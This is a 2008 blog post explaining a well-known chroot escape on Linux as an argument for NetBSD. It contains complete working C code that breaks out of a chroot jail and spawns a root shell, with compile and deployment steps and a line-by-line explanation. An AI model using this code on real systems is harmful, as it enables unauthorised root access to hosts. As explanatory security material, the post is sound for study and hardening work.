Get out of jail

By fophillips | July 14, 2008

I recently switched my server to NetBSD for a
number of reasons. Mainly it was the challenge of having a new system,
and the brief experience I had with NetBSD was positive (except screen
on x86_64 failed to detect my terminfo properly). Another deciding
factor was the heightened security available on most BSD systems, Net‐
and OpenBSD in particular. An example of this is NetBSD’s ability to
thwart a number of attack vectors for breaking out of chroot
gaols. The most prominent of which still works on Linux.

A chroot is a system call that traps a process in an environment
with a “fake” root directory so it can only access part of the
filesystem. This is often used when allowing untrusted users access to
your system, which makes this method doubly scary.

All that is needed for this to work is the ability to run a process as
root inside the chroot (being root inside a chroot is the most
common scenario) and the ability to create a directory (a given if you
are root in the chroot)

You can then use this little snippet of C code to break out of the
gaol:

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main() {
  int curdir = open(".",O_RDONLY);
  mkdir("the-way-out",1);
  chdir("the-way-out");
  chroot(".");
  fchdir(curdir);
  chdir("../../../../../../../../../..");
  chroot(".");
  system("/bin/sh");
  return 0;
}

You can then compile this with cc breakout.c -static -o breakout and
move it to your chroot through scp or whatever means you want. Run
it, and you will be granted root on the machine without a chroot.

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

This portion is just the necessary libraries for the
functions. fnctl.h is for all the file control stuff.

int main() {
  int curdir = open(".",O_RDONLY);
  mkdir("the-way-out",1);
  chdir("the-way-out");
  chroot(".");

This starts the main program function, creates a new directory and
chroots to it. You will now be chrooted in
/initial/directory/the-way-out. curdir is a file descriptor which
is used later on.

  fchdir(curdir);
  chdir("../../../../../../../../../..");

This will chdir out of your second gaol and into your first one. It
will then chdir you out of your initial chroot and put you
(hopefully) in the real root directory. If you know where you gaol is
on the real filesystem you can use the right number of ../ to get to
/. The curdir file descriptor is used as ../ won’t work from a
straight gaol, it has to be (partly) broken first.

  system("/bin/sh");
  return 0;
}

This will launch the default shell /bin/sh and give you root access to the
whole system. Congratulations, now go tell your administrator to
switch to NetBSD before someone with malicious intent comes along.

This entry was posted in software | and tagged , , Bookmark the permalink. Post a comment or leave a trackback: Trackback URL. | Edit

2 Comments

  1. Jacob
    Posted November 4, 2008 at 7:58 pm | Permalink

    Oops, “#include “, then nothing? Looking at the source of the page, PHP forgot to reinterpret the HTML entities. Might want to fix that before someone with malicious intent comes along. ;)

  2. fophillips
    Posted November 4, 2008 at 8:51 pm | Permalink

    Thanks, fixed now.

Post a Comment

Your email is never published nor shared. Required fields are marked *

*
*